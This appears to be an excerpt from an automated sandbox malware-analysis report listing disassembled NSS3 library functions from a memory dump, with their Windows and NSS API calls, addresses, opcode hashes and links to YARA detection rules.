EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6CB15262,?,?,?,6CB0E333,?,?,6CB0DC77), ref: 6CB9CB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6CB15262,?,?,?,6CB0E333,?,?,6CB0DC77), ref: 6CB9CB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6CB15262,?,?,?,6CB0E333,?,?,6CB0DC77), ref: 6CB9CBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6CB15262,?,?,?,6CB0E333,?,?,6CB0DC77), ref: 6CB9CBD2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: 5cf887c4bb90037e262232f374ce04883d59855fe188ed1786e74e3c5fd1575c
Instruction ID: d61493aa0dc2e54d7aa43727ea5addf003e1654bbbe3b6fc7956386106294870
Opcode Fuzzy Hash: 5cf887c4bb90037e262232f374ce04883d59855fe188ed1786e74e3c5fd1575c
Instruction Fuzzy Hash: 8011A272E05649ABD300AF65D840B49B3B8FB0336DF148639D80857F01E731A999CBD2

Function 6CAD4900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6CABC79F,?,?,6CAD5C4A,?), ref: 6CAD4950

Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8821
Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD883D
Part of subcall function 6CAD8800: EnterCriticalSection.KERNEL32(?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8856
Part of subcall function 6CAD8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAD8887
Part of subcall function 6CAD8800: PR_Unlock.NSS3(?,?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8899

TlsGetValue.KERNEL32(?,?,?), ref: 6CAD496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4989

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: d6ab4a2304bc7692290a491e3dba83f4f880415a0c84afe613eed0b89166909e
Instruction ID: a84cac9713c6b00fb144bbc9f2ee2aaf0c0a0acfccbc03fde126a2098f0b1be8
Opcode Fuzzy Hash: d6ab4a2304bc7692290a491e3dba83f4f880415a0c84afe613eed0b89166909e
Instruction Fuzzy Hash: 52115BB5B002019BFB005F7ADC45A1A73B8FF067ACB190135E90997B11FB21F89487D2

Function 6CB0EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CAF7FFA,?,6CAF9767,?,8B7874C0,0000A48E), ref: 6CB0EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CAF7FFA,?,6CAF9767,?,8B7874C0,0000A48E), ref: 6CB0EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CAF7FFA,?,6CAF9767,?,8B7874C0,0000A48E), ref: 6CB0EE14

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

memcpy.VCRUNTIME140(?,?,6CAF9767,00000000,00000000,6CAF7FFA,?,6CAF9767,?,8B7874C0,0000A48E), ref: 6CB0EE33

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 7b0c5c19257124d0b252073b394feee0838f74b1ed3c0a947cf9d601daa9e0f5
Instruction ID: db06600f3add862910a1af3301d9b70cc41c7f1ce509c185fc7ecfa0ed8f9463
Opcode Fuzzy Hash: 7b0c5c19257124d0b252073b394feee0838f74b1ed3c0a947cf9d601daa9e0f5
Instruction Fuzzy Hash: DE11C2B1B047DAABEB509E65DC84B4ABBA8FF0435CF204535E95986A00E730F464C7E2

Function 6CAF08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAF09B3,0000001A,?), ref: 6CAF08E9

Part of subcall function 6CAE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAF08FD

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6CAF0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAF0953

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 43ac2e293b0711771cc68274332496d2e82701498b5fedba08dc3dbf25dd89b2
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 0D01F9B1A0174A6BFB149BF59C90B6737989F40218F18443DFC3AC6F41FB31E49A8A94

Function 6CAD49C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8821
Part of subcall function 6CAD8800: TlsGetValue.KERNEL32(?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD883D
Part of subcall function 6CAD8800: EnterCriticalSection.KERNEL32(?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8856
Part of subcall function 6CAD8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAD8887
Part of subcall function 6CAD8800: PR_Unlock.NSS3(?,?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8899

PR_SetError.NSS3 ref: 6CAD4A10
TlsGetValue.KERNEL32(6CAC781D,?,6CABBD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAD4A24
EnterCriticalSection.KERNEL32(?,?,?,6CABBD28,00CD52E8), ref: 6CAD4A39
PR_Unlock.NSS3(?,?,?,?,6CABBD28,00CD52E8), ref: 6CAD4A4E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 8f4ac5c301c0bbf18ebcc564622444a0a8e4e07b0b4a52e96d717314325dff78
Instruction ID: 8a887993744d8d3253c035533d35a432b9a51faececbf1605a8b14a19d0df8e1
Opcode Fuzzy Hash: 8f4ac5c301c0bbf18ebcc564622444a0a8e4e07b0b4a52e96d717314325dff78
Instruction Fuzzy Hash: 3D2190B46057058FEB10AF79C18856AB7F4FF45758F064969D8858BB01EB30E8C4CB82

Function 6CA7EAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6CA7EB13
htonl.WSOCK32(00000000,?), ref: 6CA7EB26
htons.WSOCK32(?), ref: 6CA7EB44
PR_GetCurrentThread.NSS3(?), ref: 6CA7EB58

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: e3bf1e9c3985befb64426840fa0f2a840c183824d29fd6c36a40ea09a2f0d934
Instruction ID: 18fd3905a52e8bb467b67642eeabc612687fdfac8f884bedea12db487a54422c
Opcode Fuzzy Hash: e3bf1e9c3985befb64426840fa0f2a840c183824d29fd6c36a40ea09a2f0d934
Instruction Fuzzy Hash: 6D119075D64BD19AD3208F2589016BA77B4FFD6308B01EB1EE8CA47A61E770A0C0C3A4

Function 6CAA8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAA8DE7
EnterCriticalSection.KERNEL32 ref: 6CAA8DFC
PR_Unlock.NSS3 ref: 6CAA8E2D
PR_SetError.NSS3 ref: 6CAA8E49

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 4f21d782aed7d27f51bb085d869c86ba05510a08edfa79c90e3c627499a2c1d2
Instruction ID: 1b43962a9f9450beea9464a9bd379835660fc47639e0ff48c367f33fb2ca54a4
Opcode Fuzzy Hash: 4f21d782aed7d27f51bb085d869c86ba05510a08edfa79c90e3c627499a2c1d2
Instruction Fuzzy Hash: D8119E71605A109FD700AFB8D5882AABBF4FF09754F054929DC88D7B00EB34E895CBD2

Function 6CB12BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB12BF0

Part of subcall function 6CA895B0: TlsGetValue.KERNEL32(00000000,?,6CAA00D2,00000000), ref: 6CA895D2
Part of subcall function 6CA895B0: EnterCriticalSection.KERNEL32(?,?,?,6CAA00D2,00000000), ref: 6CA895E7
Part of subcall function 6CA895B0: PR_Unlock.NSS3(?,?,?,?,6CAA00D2,00000000), ref: 6CA89605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB12C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB12C1E
free.MOZGLUE(?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB12C4A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: d0c504fef0905cde91ee895a6216aa59230ce03b300c52d97fbf904e3be24e3a
Instruction ID: bdfb552e9fb8116fb407a2adcb4291f05755a18a682721dfcd6a349d182b73c9
Opcode Fuzzy Hash: d0c504fef0905cde91ee895a6216aa59230ce03b300c52d97fbf904e3be24e3a
Instruction Fuzzy Hash: 8B0130B5A057415BEB20CF35990474377E8AF55648F104A28E89AD3F41F731F5588692

Function 6CB2AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB15F17,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB2AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB15F17,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB2ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB2ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB1AAD4), ref: 6CB2ACDB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 97e9cf8d2a4bbf4a4539a62d793edc1c0a2c480b280f8a63802845015e40d0f1
Instruction ID: 81b128ec40572e31389264e0f713a3371cced2f4dcf616679f921115117f4459
Opcode Fuzzy Hash: 97e9cf8d2a4bbf4a4539a62d793edc1c0a2c480b280f8a63802845015e40d0f1
Instruction Fuzzy Hash: 510169B5601B519BE710DF29D908763B7E8FB00659B004839D85EC3A00EB34F058CB92

Function 6CAD88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6CAE08AA,?), ref: 6CAD88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6CAE08AA,?), ref: 6CAD890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6CAE08AA,?), ref: 6CAD8936
PR_Unlock.NSS3(?,?,?,?,?,6CAE08AA,?), ref: 6CAD8940

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: b25f86764c3ca7c1c304cabbfe6028b0b48010316743abb54f85a85397086c89
Instruction ID: 69cc3f2f2aaf636c51004a07fb0b3003d5813aa767a75eb299713d2a3095f836
Opcode Fuzzy Hash: b25f86764c3ca7c1c304cabbfe6028b0b48010316743abb54f85a85397086c89
Instruction Fuzzy Hash: 030161B4604A059FDB00AF79D084659B7F4FF05398F06062AD88887B01E734F4D4CBD2

Function 6CAE24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CABC154,000000FF,00000000,00000000,00000000,00000000,?,?,6CABC154,?), ref: 6CAE24FA
PORT_Alloc_Util.NSS3(00000000,?,6CABC154,?), ref: 6CAE2509

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6CAE2525
free.MOZGLUE(00000000), ref: 6CAE2532

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: 7ba9114cd86d2ffa0f12e7b99c0279a43ac65922c703d61373e5ec8c71ddc156
Instruction ID: 8a42ae7512db6e7e91151e5b32f4dfce82f94ff33cfd2c01c5ce1847bf8c8749
Opcode Fuzzy Hash: 7ba9114cd86d2ffa0f12e7b99c0279a43ac65922c703d61373e5ec8c71ddc156
Instruction Fuzzy Hash: 0AF0F6B230212237FA2029BA6C18E773AACDB067F9B180330BD28C66C0DD10D841D1F1

Function 6CB2AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CB15D40,00000000,?,?,6CB06AC6,6CB1639C), ref: 6CB2AC2D

Part of subcall function 6CACADC0: TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE10
Part of subcall function 6CACADC0: EnterCriticalSection.KERNEL32(?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE24
Part of subcall function 6CACADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CAAD079,00000000,00000001), ref: 6CACAE5A
Part of subcall function 6CACADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE6F
Part of subcall function 6CACADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE7F
Part of subcall function 6CACADC0: TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEB1
Part of subcall function 6CACADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEC9

PK11_FreeSymKey.NSS3(?,6CB15D40,00000000,?,?,6CB06AC6,6CB1639C), ref: 6CB2AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB15D40,00000000,?,?,6CB06AC6,6CB1639C), ref: 6CB2AC59
free.MOZGLUE(8CB6FF01,6CB06AC6,6CB1639C,?,?,?,?,?,?,?,?,?,6CB15D40,00000000,?,6CB1AAD4), ref: 6CB2AC62

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 5dfdb7f6e129aab2564c6224145ab51016002be588927c2d062bf8b1f06ace3d
Instruction ID: a5a90e2e4aba7dc0f656a480398165ffb31724f4b76764ba9b7f0b1b9c46f928
Opcode Fuzzy Hash: 5dfdb7f6e129aab2564c6224145ab51016002be588927c2d062bf8b1f06ace3d
Instruction Fuzzy Hash: 680128B56002149BDB00DF15EDC0B667BA8EB44B5CF1880A8E9498F706D735E848CBA2

Function 6CB10840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBE2F88,6CB10660,00000020,00000000,?,?,6CB12C3D,?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB10860

Part of subcall function 6CA04C70: TlsGetValue.KERNEL32(?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04C97
Part of subcall function 6CA04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CB0
Part of subcall function 6CA04C70: PR_Unlock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6CB12C3D,?,00000000,00000000,?,6CB12A28,00000060,00000001), ref: 6CB10874
EnterCriticalSection.KERNEL32(00000001), ref: 6CB10884
PR_Unlock.NSS3 ref: 6CB108A3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 3318c4fa1e6f1af2a9cbe29b42ba195d4e489d6ed7dc0d47caccb0b16890ead8
Instruction ID: 10fcd1f2fde5f7c7fdeb68a9d21607c62d28d03505d27a4734dea7f106692910
Opcode Fuzzy Hash: 3318c4fa1e6f1af2a9cbe29b42ba195d4e489d6ed7dc0d47caccb0b16890ead8
Instruction Fuzzy Hash: 9F01F775A0C2C56BEF012F68FC45A557738EB5A76AF080261FC0853E02EF2294A486E2

Function 6CB9CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CB9CC61
free.MOZGLUE ref: 6CB9CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CB9CC80
free.MOZGLUE(?), ref: 6CB9CC87

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
